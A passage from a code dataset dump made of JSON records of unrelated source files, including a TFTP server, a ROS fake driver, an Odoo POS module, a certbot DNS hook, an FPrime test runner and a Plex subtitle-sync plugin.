Convert all '\\' to '/' to be\n # unix compatiable.\n file_name = file_name.replace(b'\\\\', b'/')\n mac_address = get_remote_mac()\n if mac_address is not None:\n log_request(mac_address, file_name)\n d = self.get_boot_method(file_name)\n d.addCallback(partial(self.handle_boot_method, file_name))\n d.addErrback(self.no_response_errback, file_name)\n d.addErrback(self.all_is_lost_errback)\n return d\n\n\nclass Port(udp.Port):\n \"\"\"A :py:class:`udp.Port` that groks IPv6.\"\"\"\n\n # This must be set by call sites.\n addressFamily = None\n\n def getHost(self):\n \"\"\"See :py:meth:`twisted.internet.udp.Port.getHost`.\"\"\"\n host, port = self.socket.getsockname()[:2]\n addr_type = IPv6Address if isIPv6Address(host) else IPv4Address\n return addr_type('UDP', host, port)\n\n\nclass UDPServer(internet.UDPServer):\n \"\"\"A :py:class:`~internet.UDPServer` that groks IPv6.\n\n This creates the port directly instead of using the reactor's\n ``listenUDP`` method so that we can do a switcharoo to our own\n IPv6-enabled port implementation.\n \"\"\"\n\n def _getPort(self):\n \"\"\"See :py:meth:`twisted.application.internet.UDPServer._getPort`.\"\"\"\n return self._listenUDP(*self.args, **self.kwargs)\n\n def _listenUDP(self, port, protocol, interface='', maxPacketSize=8192):\n \"\"\"See :py:meth:`twisted.internet.reactor.listenUDP`.\"\"\"\n p = Port(port, protocol, interface, maxPacketSize)\n p.addressFamily = AF_INET6 if isIPv6Address(interface) else AF_INET\n p.startListening()\n return p\n\n\nclass TFTPService(MultiService, object):\n \"\"\"An umbrella service representing a set of running TFTP servers.\n\n Creates a UDP server individually for each discovered network\n interface, so that we can detect the interface via which we have\n received a datagram.\n\n It then periodically updates the servers running in case there's a\n change to the host machine's network configuration.\n\n :ivar backend: The :class:`TFTPBackend` being used to service TFTP\n requests.\n\n :ivar port: The port on which each server is started.\n\n :ivar refresher: A :class:`TimerService` that calls\n ``updateServers`` periodically.\n\n \"\"\"\n\n def __init__(self, resource_root, port, client_service):\n \"\"\"\n :param resource_root: The root directory for this TFTP server.\n :param port: The port on which each server should be started.\n :param client_service: The RPC client service for the rack controller.\n \"\"\"\n super(TFTPService, self).__init__()\n self.backend = TFTPBackend(resource_root, client_service)\n self.port = port\n # Establish a periodic call to self.updateServers() every 45\n # seconds, so that this service eventually converges on truth.\n # TimerService ensures that a call is made to it's target\n # function immediately as it's started, so there's no need to\n # call updateServers() from here.\n self.refresher = internet.TimerService(45, self.updateServers)\n self.refresher.setName(\"refresher\")\n self.refresher.setServiceParent(self)\n\n def getServers(self):\n \"\"\"Return a set of all configured servers.\n\n :rtype: :class:`set` of :class:`internet.UDPServer`\n \"\"\"\n return {\n service for service in self\n if service is not self.refresher\n }\n\n def updateServers(self):\n \"\"\"Run a server on every interface.\n\n For each configured network interface this will start a TFTP\n server. 
If called later it will bring up servers on newly\n configured interfaces and bring down servers on deconfigured\n interfaces.\n \"\"\"\n addrs_established = set(service.name for service in self.getServers())\n addrs_desired = set(get_all_interface_addresses())\n\n for address in addrs_desired - addrs_established:\n if not IPAddress(address).is_link_local():\n tftp_service = UDPServer(\n self.port, TFTP(self.backend), interface=address)\n tftp_service.setName(address)\n tftp_service.setServiceParent(self)\n\n for address in addrs_established - addrs_desired:\n tftp_service = self.getServiceNamed(address)\n tftp_service.disownServiceParent()\n","sub_path":"provisioningserver/rackdservices/tftp.py","file_name":"tftp.py","file_ext":"py","file_size_in_byte":18058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441469166","text":"#!/usr/bin/python\n#################################################################\n##\\file\n#\n# \\note\n# Copyright (c) Felix Messmer \\n\n# Fraunhofer Institute for Manufacturing Engineering\n# and Automation (IPA) \\n\n#\n# All rights reserved. \\n\\n\n#\n#################################################################\n#\n# \\note\n# Repository name: cob_command_tools\n# \\note\n# ROS package name: cob_helper_tools\n#\n# \\author\n# Author: Felix Messmer\n#\n# \\date Date of creation: January 2017\n#\n# \\brief\n# A script providing services to fake a (ros_canopen) driver\n#\n#################################################################\n\nimport rospy\nfrom std_srvs.srv import *\nfrom diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus\n\nclass FakeDriver():\n\n def __init__(self):\n self.init_srv = rospy.Service('driver/init', Trigger, self.srv_cb)\n self.recover_srv = rospy.Service('driver/recover', Trigger, self.srv_cb)\n self.halt_srv = rospy.Service('driver/halt', Trigger, self.srv_cb)\n self.shutdown_srv = rospy.Service('driver/shutdown', Trigger, self.srv_cb)\n\n self._fake_diag_pub = rospy.Publisher('/diagnostics', DiagnosticArray, queue_size=1)\n rospy.Timer(rospy.Duration(1.0), self.publish_diagnostics)\n\n def publish_diagnostics(self, event):\n msg = DiagnosticArray()\n msg.header.stamp = rospy.get_rostime()\n\n status = DiagnosticStatus()\n status.name = rospy.get_name()\n status.level = DiagnosticStatus.OK\n status.message = \"fake diagnostics\"\n status.hardware_id = rospy.get_name()\n msg.status.append(status)\n\n self._fake_diag_pub.publish(msg)\n\n def srv_cb(self, req):\n resp = TriggerResponse()\n resp.success = True\n return resp\n\n\nif __name__ == \"__main__\":\n rospy.init_node('fake_driver')\n FakeDriver()\n rospy.loginfo(\"fake_driver running\")\n rospy.spin()\n\n","sub_path":"cob_helper_tools/scripts/fake_driver.py","file_name":"fake_driver.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"402635424","text":"# =============================================================================\n# OWSLib. Copyright (C) 2005 Sean C. 
Gillies\n#\n# Contact email: sgillies@frii.com\n# =============================================================================\n\ndef patch_well_known_namespaces(etree_module):\n \"\"\"Monkey patches the etree module to add some well-known namespaces.\"\"\"\n etree_module._namespace_map.update({\n \"http://www.w3.org/1999/02/22-rdf-syntax-ns#\": \"rdf\", \n \"http://purl.org/rss/1.0/\": \"rss\", \n \"http://purl.org/rss/1.0/modules/taxonomy/\": \"taxo\", \n \"http://purl.org/dc/elements/1.1/\": \"dc\", \n \"http://purl.org/rss/1.0/modules/syndication/\": \"syn\", \n \"http://www.w3.org/2003/01/geo/wgs84_pos#\": \"geo\",\n \"http://www.opengis.net/cat/csw/2.0.2\": \"csw\",\n \"http://purl.org/dc/terms/\": \"dct\",\n \"http://www.isotc211.org/2005/gco\": \"gco\",\n \"http://www.isotc211.org/2005/gmd\": \"gmd\",\n \"http://www.isotc211.org/2005/gts\": \"gts\",\n \"http://www.isotc211.org/2005/srv\": \"srv\",\n \"http://www.fgdc.gov\": \"fgdc\",\n \"http://gcmd.gsfc.nasa.gov/Aboutus/xml/dif/\": \"dif\",\n \"http://www.opengis.net/gml\": \"gml\",\n \"http://www.opengis.net/ogc\": \"ogc\",\n \"http://www.opengis.net/ows\": \"ows\",\n \"http://www.opengis.net/ows/1.1\": \"ows\",\n \"http://www.opengis.net/ows/2.0\": \"ows\",\n \"http://www.opengis.net/wms\": \"wms\",\n \"http://www.opengis.net/context\": \"wmc\",\n \"http://www.opengis.net/wfs\": \"wfs\",\n \"http://www.opengis.net/sos/1.0\": \"sos\",\n \"urn:oasis:names:tc:ebxml-regrep:xsd:rim:3.0\": \"rim\",\n \"http://www.w3.org/2001/XMLSchema\": \"xs\",\n \"http://www.w3.org/XML/Schema\": \"xs2\",\n \"http://www.w3.org/2001/XMLSchema-instance\": \"xsi\",\n \"http://www.w3.org/1999/xlink\": \"xlink\"})\n\n# try to find elementtree or lxml\ntry:\n from lxml import etree\nexcept ImportError:\n try:\n # Python < 2.5 with ElementTree installed\n import elementtree.ElementTree as etree\n patch_well_known_namespaces(etree)\n except ImportError:\n try:\n # Python 2.5 with ElementTree included\n import xml.etree.ElementTree as etree\n patch_well_known_namespaces(etree)\n except ImportError:\n raise RuntimeError('You need either ElementTree or lxml to use OWSLib!')\n\n","sub_path":"owslib/etree.py","file_name":"etree.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"565989546","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, models, fields, registry\nimport json\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nclass pos_bus(models.Model):\n _name = \"pos.bus\"\n _description = \"Branch/Store of shops\"\n\n name = fields.Char('Location Name', required=1)\n user_id = fields.Many2one('res.users', string='Sale admin')\n log_ids = fields.One2many('pos.bus.log', 'bus_id', string='Logs')\n\n @api.model\n def sync_orders(self, config_id, datas):\n config = self.env['pos.config'].sudo().browse(config_id)\n sessions = self.env['pos.session'].sudo().search([\n ('state', '=', 'opened')\n ])\n for session in sessions:\n if session.config_id.user_id and session.config_id.user_id != self.env.user and session.config_id and session.config_id.bus_id and session.config_id.bus_id.id == config.bus_id.id:\n for data in datas:\n value = {\n 'data': data,\n 'action': 'new_order',\n 'bus_id': config.bus_id.id,\n 'order_uid': data['uid']\n }\n _logger.info('Sync order to %s' % session.config_id.user_id.login)\n self.env['bus.bus'].sendmany(\n [[(self.env.cr.dbname, 'pos.bus', session.config_id.user_id.id), json.dumps({\n 'user_send_id': self.env.user.id,\n 
'value': value\n })]])\n\n\nclass pos_bus_log(models.Model):\n _name = \"pos.bus.log\"\n _description = \"Transactions of Branch/Store\"\n\n user_id = fields.Many2one('res.users', 'User', required=1, ondelete='cascade')\n bus_id = fields.Many2one('pos.bus', 'Branch/Store', required=1, ondelete='cascade')\n action = fields.Selection([\n ('selected_order', 'Change order'),\n ('new_order', 'Add order'),\n ('unlink_order', 'Remove order'),\n ('line_removing', 'Remove line'),\n ('set_client', 'Set customer'),\n ('trigger_update_line', 'Update line'),\n ('change_pricelist', 'Add pricelist'),\n ('sync_sequence_number', 'Sync sequence order'),\n ('lock_order', 'Lock order'),\n ('unlock_order', 'Unlock order'),\n ('set_line_note', 'Set note'),\n ('set_state', 'Set state'),\n ('order_transfer_new_table', 'Transfer to new table'),\n ('set_customer_count', 'Set guest'),\n ('request_printer', 'Request printer'),\n ('set_note', 'Set note'),\n ('paid_order', 'Paid order')\n ], string='Action', required=1)\n\n\n\n","sub_path":"models/pos/pos_bus.py","file_name":"pos_bus.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"342658110","text":"import os, sys, commands\n\nImport('env')\nImport('platform_libs')\nImport('boost_path')\n\nall_libs = []\nall_libs += [platform_libs]\nall_libs += [File(os.path.join(boost_path, 'libboost_log_setup.a'))]\nall_libs += [File(os.path.join(boost_path, 'libboost_log.a'))]\nall_libs += [File(os.path.join(boost_path, 'libboost_thread.a'))]\nall_libs += [File(os.path.join(boost_path, 'libboost_system.a'))]\nall_libs += [File(os.path.join(boost_path, 'libboost_filesystem.a'))]\n\nsources = []\nsources += Glob('*.cc')\nsources += ['../common/chef_log.o']\nsources += ['../common/statistics.o']\n\nprgs = []\nprgs += env.Program('server2', sources, LIBS = all_libs)\nReturn('prgs')\n","sub_path":"src/server2/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"584307023","text":"import sys\nimport json\nimport requests\n\n\nclass NameComDNS:\n def __init__(self, domain_name):\n self.username = 'username at name.com'\n self.token = 'token'\n self.domain_name = domain_name\n\n def list_records(self):\n url = 'https://api.name.com/v4/domains/%s/records' % self.domain_name\n r = requests.get(url, auth=(self.username, self.token))\n\n return r.json()\n\n def create_record(self, data):\n url = 'https://api.name.com/v4/domains/%s/records' % self.domain_name\n r = requests.post(url, data=json.dumps(data), auth=(self.username, self.token))\n if r.status_code == 200 or r.status_code == 201:\n print(r.json())\n else:\n print('%s: %s' % (r.status_code, r.content))\n\n def del_record(self, record_id):\n url = 'https://api.name.com/v4/domains/%s/records/%s' % (self.domain_name, record_id)\n r = requests.delete(url, data=data, auth=(self.username, self.token))\n\n print(r.json())\n\n\nif __name__ == '__main__':\n\n file_name, cmd, certbot_domain, certbot_validation = sys.argv\n\n data = {\n 'domainName': 'lonelyassistant.net',\n 'host': '_acme-challenge',\n 'fqdn': '_acme-challenge.lonelyassistant.net',\n 'type': 'TXT',\n 'answer': certbot_validation,\n 'ttl': 300,\n }\n\n ncd = NameComDNS(certbot_domain)\n\n if cmd == 'add':\n ncd.create_record(data)\n\n elif cmd == 'clean':\n j = ncd.list_records()\n\n for record in j['records']:\n if record['host'] == '_acme-challenge':\n 
ncd.del_record(record['id'])\n\n\n\n","sub_path":"name_com_dns.py","file_name":"name_com_dns.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198561017","text":"#!/usr/bin/python\n\nimport json\nimport redis\n\nr = redis.Redis(unix_socket_path='/tmp/redis.sock')\n\n\nc = r.scan_iter('user::*')\nfor k in c:\n user = json.loads(r.get(k), encoding='utf-8')\n if 'location' in user and user['location']:\n (lng, lat) = user['location']['geo']['coordinates']\n r.execute_command('geoadd', 'users:geo:::', lng, lat, k)\n print('Indexed user %s' % (user['profile']['name']))\n\nr.delete(\"users:geo::\")\n","sub_path":"utils/reindex_geo.py","file_name":"reindex_geo.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"609972748","text":"from gensim.models import KeyedVectors as Word2Vec\nimport extractors.tokenizer as tokenizer\n#import tokenizer\nimport numpy as np\nimport os\n\n\nbasepath = \"/home/bt1/13CS10037/btp_final_from_server\"\ndatapath = basepath+\"/ayush_dataset\"\n\ndef get_stopwords(filename):\n words = open(filename, \"r\")\n return [ word.strip() for word in words.readlines()]\n\nmodel = None\nstopwords = get_stopwords(os.path.join(datapath, \"stopwords.txt\"))\n\nNDIM = 300\ndef features(text):\n\tglobal model\n\tif(model is None):\n\t\tmodel = Word2Vec.load_word2vec_format('embeddings/google_news_300.bin', binary=True)\n\t\tprint(\"Word vector model Loaded\")\n\tparsed = tokenizer.parse(text.strip())\n\tembeds = []\n\tfor sentence in parsed:\n\t\ttoks = sentence['tokens']\n\t\tfor tokeninfo in toks:\n\t\t\tif tokeninfo['word'].lower() in stopwords:\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\tword = tokeninfo['word'].lower()\n\t\t\t\tembeds.append(model[word].tolist())\n\t\t\texcept:\n\t\t\t\ttry:\n\t\t\t\t\tembeds.append(model[tokeninfo['lemma'].lower()].tolist())\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\tembeds = np.asarray(embeds)\n\tif(len(embeds) > 0):\n\t\treturn np.mean(embeds, axis=0)\n\telse:\n\t\treturn np.zeros(NDIM)\n\ndef feature_names():\n\treturn [\"embed_\"+str(i) for i in range(NDIM)]\n\n\ndef feature_name_type():\n\treturn [(\"embed_\"+str(i), \"REAL\") for i in range(NDIM)]\n\n\ndef sentence_sim(sent1, sent2):\n\tglobal model\n\tif(model is None):\n\t\tmodel = Word2Vec.load_word2vec_format('embeddings/google_news_300.bin', binary=True)\n\tparsed = tokenizer.parse(sent1.strip())\n\tsent1_ = [tokeninfo['word'] for sentence in parsed \n\t\tfor tokeninfo in sentence['tokens'] if tokeninfo['word'] not in stopwords]\n\tparsed = tokenizer.parse(sent2.strip())\n\tsent2_ = [tokeninfo['word'] for sentence in parsed \n\t\tfor tokeninfo in sentence['tokens'] if tokeninfo['word'] not in stopwords]\n\n\treturn model.wmdistance(sent1_, sent2_)\n\n\n\n#print(features(\"Word is a game\"))\n\n\n","sub_path":"extractors/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"539130116","text":"def replace(s: str)-> str:\n \"\"\"\n 对s中的空格进行替换,要求是inplace,返回s\n \"\"\"\n s = list(s)\n num_space = 0\n for ch in s:\n if ch == \" \":\n num_space += 1\n old_len = len(s) - 1\n new_len = old_len + 2 * num_space\n s = s + 2 * num_space * [\" \"]\n while old_len >= 0:\n if s[old_len] == \" \":\n s[new_len-2:new_len+1] = [\"%\", \"2\", \"0\"]\n new_len -= 3\n else:\n s[new_len] = 
s[old_len]\n new_len -= 1\n old_len -= 1\n return \"\".join(s)\n\n\ndef test():\n s = \"We are happy.\"\n s1 = \" this is . \"\n print(replace(s))\n print(replace(s1))\n\nif __name__ == \"__main__\":\n test()\n\n","sub_path":"04-字符串替换/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222803942","text":"'''\nFPrimeTestRunner\n\nA runner used to set the colorization of the results, and interactivity when regarding\nsuites and tests. This overrides the standard unittest test runner.\n\n@author: mstarch\n'''\nimport re\nimport collections\nimport unittest\n\ntry:\n import colour_runner.result\n TestClass = colour_runner.result.ColourTextTestResult\nexcept ImportError:\n TestClass = unittest.runner.TextTestResult\n\nclass FPrimeTestRunner(unittest.runner.TextTestRunner):\n '''\n An FPrime variant of the standard text runner used to set the test\n runner's result class to use the colorized variant if it exists\n '''\n resultclass = TestClass\n NO = 0\n YES = 1\n ALL = 2\n YES_NO_RE = re.compile(\"^((?:yes)|(?:no)|(?:y)|(?:n))$\", re.IGNORECASE)\n YES_NO_ALL_RE = re.compile(\"^((?:yes)|(?:no)|(?:y)|(?:n)|(?:all)|(?:a))$\", re.IGNORECASE)\n\n def __init__(self, *args, **kwargs):\n '''\n Setup this test, passing in input to super\n @param args: arguments (positional) to forward\n @param kwargs: key word arguments (interactive) will be stripped before\n pass through to super\n '''\n self.interactive = False\n #Interactive KWArgs striping\n if \"interactive\" in kwargs:\n self.interactive = kwargs[\"interactive\"]\n del kwargs[\"interactive\"]\n self.testbed = {\"name\": \"default\"}\n #testbed KWArgs striping\n if \"testbed\" in kwargs:\n self.testbed = kwargs[\"testbed\"]\n del kwargs[\"testbed\"]\n #no_color\n if \"no_color\" in kwargs:\n self.no_color = kwargs[\"no_color\"]\n del kwargs[\"no_color\"]\n if self.no_color:\n FPrimeTestRunner.resultclass = unittest.runner.TextTestResult\n unittest.runner.TextTestRunner.__init__(self, *args, **kwargs)\n\n def run(self, test):\n '''\n Run the test\n '''\n spec = self.recurse_for_tests(test)\n for name, tests in spec.iteritems():\n suite_resp = self.get_interactive_response(name)\n #Loop through the suite asking for each if required\n for indv, func in tests:\n #Check global responses\n if suite_resp == self.ALL:\n continue\n elif suite_resp == self.NO:\n self.skip(func)\n continue\n #Get individual response\n resp = self.get_interactive_response(indv, self.YES_NO_RE)\n if resp == self.NO:\n self.skip(func)\n return unittest.runner.TextTestRunner.run(self, test)\n\n def skip(self, func):\n '''\n Skip a given test\n @param func: function to skip\n '''\n #Python 2/3\n try:\n setattr(func, \"__unittest_skip__\", True)\n setattr(func, \"__unittest_skip_why__\", \"User interactively skipped test\")\n except AttributeError:\n setattr(func.__func__, \"__unittest_skip__\", True)\n setattr(func.__func__, \"__unittest_skip_why__\", \"User interactively skipped test\")\n\n def recurse_for_tests(self, test, rdict=None):\n '''\n Recurse through the TestSuite to look for individual tests, and then roll up the tests\n by module in order to get a list that we can interact with.\n @param test: test or testsuite\n '''\n #Prevent run-on-init default parameters\n if rdict is None:\n rdict = collections.OrderedDict()\n #If it is not a test suite, add test\n if not hasattr(test, \"_tests\"):\n module = test.__module__\n name = test._testMethodName\n 
test = getattr(test, name)\n tup = (name, test)\n #Setup dictionary entry if not there and add the tuple\n if not module in rdict:\n rdict[module] = []\n rdict[module].append(tup)\n #For test cases, recurse\n else:\n for tmp in getattr(test, \"_tests\"):\n self.recurse_for_tests(tmp, rdict)\n return rdict\n\n def get_interactive_response(self, test, reg=YES_NO_ALL_RE):\n '''\n Gets an interactive response from a user. It must match one of the following:\n - y or yes: run this test (don't skip)\n - n or no: do not run this script (skip)\n - a or all: run all the tests in this test case\n @param test: test/test suite name\n @return: YES, NO, ALL\n '''\n #Short circuit a response if non-interactive and skipped tests\n if not self.interactive:\n return self.ALL\n #Attempted, not always working\n elif getattr(test, \"__unittest_skip__\", False):\n return self.YES\n #Check for test suit\n prompt = \"(yes, no, all)\" if reg is self.YES_NO_ALL_RE else \"(yes, no)\"\n #Match a response\n text = \"\"\n while not reg.match(text):\n text = raw_input(\"Run {0} {1}:\".format(test, prompt))\n text = reg.match(text).group(1).lower()\n return self.YES if text.startswith(\"y\") else (self.ALL if text.startswith(\"a\") else self.NO)\n","sub_path":"Gse/src/fprime/gse/testing/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"497388359","text":"# -*- coding: utf-8 -*-\r\n#########################################################\r\n# python\r\nimport os\r\nfrom datetime import datetime\r\nimport traceback\r\nimport logging\r\nimport subprocess\r\nimport time\r\nimport re\r\nimport threading\r\nimport json\r\nimport platform\r\nimport requests\r\n\r\n# third-party\r\nfrom flask import Blueprint, request, Response, send_file, render_template, redirect, jsonify\r\n\r\n# sjva 공용\r\nfrom framework import app, db, scheduler, path_app_root, socketio\r\nfrom framework.job import Job\r\nfrom framework.util import Util, AlchemyEncoder\r\nfrom framework.common.share import RcloneTool\r\nfrom system.model import ModelSetting as SystemModelSetting\r\n\r\n# 패키지\r\nfrom .plugin import logger, package_name, SERVER_URL\r\nfrom .logic import Logic\r\nfrom .model import ModelSetting, ModelClientAVSubItem\r\n\r\n#########################################################\r\n\r\n\r\n\r\nclass LogicAVSub(object):\r\n @staticmethod\r\n def process_ajax(sub, req):\r\n try:\r\n if sub == 'get_server_list':\r\n action = req.form['action']\r\n last_updated_time = ModelSetting.get('av_sub_last_updated_time')\r\n if action == 'all':\r\n last_updated_time = ''\r\n def func():\r\n ret = {'ret':False}\r\n page = 1\r\n count = 0\r\n while True:\r\n url = SERVER_URL + '/gd_share_server/noapi/av_sub/list?last_updated_time=%s&page=%s' % (last_updated_time, page)\r\n logger.debug(url)\r\n data = requests.get(url).json()\r\n for item in data['list']:\r\n #logger.debug(item)\r\n ModelClientAVSubItem.insert(item)\r\n count += 1\r\n #if data['paging']['next_page'] == 0 or data['paging']['current_page'] == data['paging']['last_page']:\r\n #logger.debug(data['paging'])\r\n if data['paging']['current_page'] >= data['paging']['total_page']:\r\n break\r\n page += 1\r\n ModelSetting.set('av_sub_last_updated_time', datetime.now().strftime('%Y-%m-%d %H:%M:%S') )\r\n ret['ret'] = True\r\n ret['data'] = count\r\n if action == 'all':\r\n data = {'type':'info', 'msg' : u'%s개를 업데이트 했습니다.' 
% count, 'url':''}\r\n socketio.emit(\"notify\", data, namespace='/framework', broadcast=True)\r\n return ret\r\n if action == 'all':\r\n thread = threading.Thread(target=func, args=())\r\n thread.setDaemon(True)\r\n thread.start()\r\n return jsonify(True)\r\n else:\r\n ret = func()\r\n return jsonify(ret)\r\n elif sub == 'get_server_count':\r\n url = SERVER_URL + '/gd_share_server/noapi/av_sub/count'\r\n data = requests.get(url).json()\r\n return jsonify(data) \r\n elif sub == 'web_list':\r\n ret = ModelClientAVSubItem.web_list(req)\r\n return jsonify(ret)\r\n elif sub == 'get_by_folder_name':\r\n ret = ModelClientAVSubItem.get_by_folder_name(req.form['folder_name']).as_dict()\r\n return jsonify(ret)\r\n elif sub == 'plex_search':\r\n ret = LogicAVSub.plex_search(req.form['keyword'])\r\n return jsonify(ret)\r\n elif sub == 'srt_copy':\r\n ret = LogicAVSub.srt_copy(req.form['folder_name'], req.form['srt_index'])\r\n return jsonify(ret)\r\n elif sub == 'plex_refresh':\r\n ret = LogicAVSub.plex_refresh(req.form['metakey'], req.form['folder_name'])\r\n return jsonify(ret) \r\n elif sub == 'do_action':\r\n logger.debug(req.form)\r\n mode = req.form['mode']\r\n server_type = req.form['server_type']\r\n folder_id = req.form['folder_id']\r\n folder_name = req.form['folder_name']\r\n server_filename = req.form['server_filename']\r\n remote_path = req.form['my_remote_path']\r\n action = req.form['action']\r\n mode = 'download' if mode == '0' else 'upload'\r\n server_type = 'category' if server_type == '0' else 'content'\r\n def func():\r\n RcloneTool.do_action(ModelSetting.get('rclone_path'), ModelSetting.get('rclone_config_path'), mode, server_type, folder_id, folder_name, server_filename, remote_path, action, folder_id_encrypted=True)\r\n if mode == 'upload' and server_type == 'content':\r\n tmp = remote_path.split('/')\r\n tmp2 = tmp[-1].split('.')\r\n if tmp2[-1].lower() in ['mp4', 'mkv', 'avi', 'wmv', 'srt']:\r\n url = SERVER_URL + '/gd_share_server/noapi/av_sub/refresh?folder_name=%s' % folder_name\r\n else:\r\n #url = SERVER_URL + '/gd_share_server/noapi/av_sub/refresh?folder_name=%s' % tmp[-1]\r\n pass\r\n data = requests.get(url).json()\r\n msg = u'모두 완료되었습니다.\\n'\r\n socketio.emit(\"command_modal_add_text\", str(msg), namespace='/framework', broadcast=True)\r\n thread = threading.Thread(target=func, args=())\r\n thread.setDaemon(True)\r\n thread.start()\r\n return jsonify('')\r\n elif sub == 'plex_search_all':\r\n #return Response(LogicAVSub.plex_search_all(), mimetype=\"text/event-stream\")\r\n LogicAVSub.plex_search_all()\r\n return jsonify('')\r\n elif sub == 'reset_db':\r\n db.session.query(ModelClientAVSubItem).delete()\r\n db.session.commit()\r\n ret = True\r\n return jsonify(ret) \r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n\r\n #################################################################\r\n\r\n @staticmethod\r\n def plex_search(keyword):\r\n try:\r\n logger.debug(keyword)\r\n from plex.logic_normal import LogicNormal\r\n data = LogicNormal.find_by_filename_part(keyword)\r\n\r\n item = ModelClientAVSubItem.get_by_folder_name(keyword)\r\n if len(data['list']) > 0:\r\n item.plex_metakey = ','.join(data['metadata_id'])\r\n item.remote_path = LogicAVSub.get_remote_path(data['list'][0]['dir'])\r\n data = LogicAVSub.set_remote_path(data)\r\n item.set_plex_json(data)\r\n logger.debug(data)\r\n return data\r\n \r\n except Exception as e: \r\n logger.error('Exception:%s', e) \r\n 
logger.error(traceback.format_exc())\r\n\r\n @staticmethod\r\n def plex_refresh(metakey, folder_name):\r\n try:\r\n from plex.logic_normal import LogicNormal\r\n data = LogicNormal.metadata_refresh(metadata_id=metakey.split('/')[-1])\r\n LogicAVSub.plex_search(folder_name)\r\n return True\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n return False\r\n\r\n\r\n @staticmethod\r\n def get_remote_path(filepath):\r\n try:\r\n rule = ModelSetting.get('av_sub_plex_match_rule')\r\n if rule is not None:\r\n tmp = rule.split('|')\r\n ret = filepath.replace(tmp[1], tmp[0])\r\n if filepath[0] != '/':\r\n ret = ret.replace('\\\\', '/')\r\n return ret.replace('//', '/').replace('\\\\\\\\', '\\\\')\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n \r\n @staticmethod\r\n def set_remote_path(data):\r\n try:\r\n rule = ModelSetting.get('av_sub_plex_match_rule')\r\n tmp = rule.split('|')\r\n if rule == '':\r\n return data\r\n for item in data['list']:\r\n ret = item['filepath'].replace(tmp[1], tmp[0])\r\n if item['filepath'][0] != '/':\r\n ret = ret.replace('\\\\', '/')\r\n ret = ret.replace('//', '/').replace('\\\\\\\\', '\\\\')\r\n item['remote_path'] = ret\r\n return data\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n \r\n\r\n @staticmethod\r\n def srt_copy(folder_name, source_index):\r\n try:\r\n item = ModelClientAVSubItem.get_by_folder_name(folder_name)\r\n logger.debug(item.plex_json)\r\n \r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n\r\n @staticmethod\r\n def plex_search_all():\r\n try:\r\n def func():\r\n data = ModelClientAVSubItem.get_plex_search_all()\r\n log = u\"%s개의 데이터를 분석을 시작합니다.\\n\" % len(data)\r\n socketio_callback('add', {'data':log})\r\n plex_log = log\r\n #data = data[:100]\r\n for index, tmp in enumerate(data):\r\n ret = LogicAVSub.plex_search(tmp.folder_name)\r\n log = u'%s / %s. 
%s => %s\\n' % (index+1, len(data), tmp.folder_name, tmp.plex_metakey)\r\n socketio_callback('add', {'data':log})\r\n plex_log += log\r\n thread = threading.Thread(target=func, args=())\r\n thread.setDaemon(True)\r\n thread.start()\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n\r\n\r\n @staticmethod\r\n def get_path_list(key):\r\n tmps = ModelSetting.get_list(key)\r\n ret = []\r\n for t in tmps:\r\n if t.endswith('*'):\r\n dirname = os.path.dirname(t)\r\n listdirs = os.listdir(dirname)\r\n for l in listdirs:\r\n ret.append(os.path.join(dirname, l))\r\n else:\r\n ret.append(t)\r\n return ret\r\n\r\n\r\n @staticmethod\r\n def get_download_remote_path(folder_name):\r\n tmps = LogicAVSub.get_path_list('av_sub_library_path')\r\n #logger.debug('folder_name: (%s)', folder_name)\r\n label = folder_name.split('-')[0].upper()\r\n path = os.path.join(ModelSetting.get('av_sub_no_library_path'), label)\r\n for t in tmps:\r\n tmp_path = os.path.join(t, label)\r\n if os.path.isdir(tmp_path):\r\n path = tmp_path\r\n break\r\n\r\n return LogicAVSub.get_remote_path(path)\r\n\r\n\r\n#########################################################\r\n# socketio / sub\r\n#########################################################\r\nsid_list = []\r\nplex_log = ''\r\n@socketio.on('connect', namespace='/%s/av_sub' % package_name)\r\ndef connect():\r\n try:\r\n logger.debug('socket_connect')\r\n sid_list.append(request.sid)\r\n socketio_callback('start', {'data':plex_log})\r\n #socketio_callback('connect',{})\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n\r\n\r\n@socketio.on('disconnect', 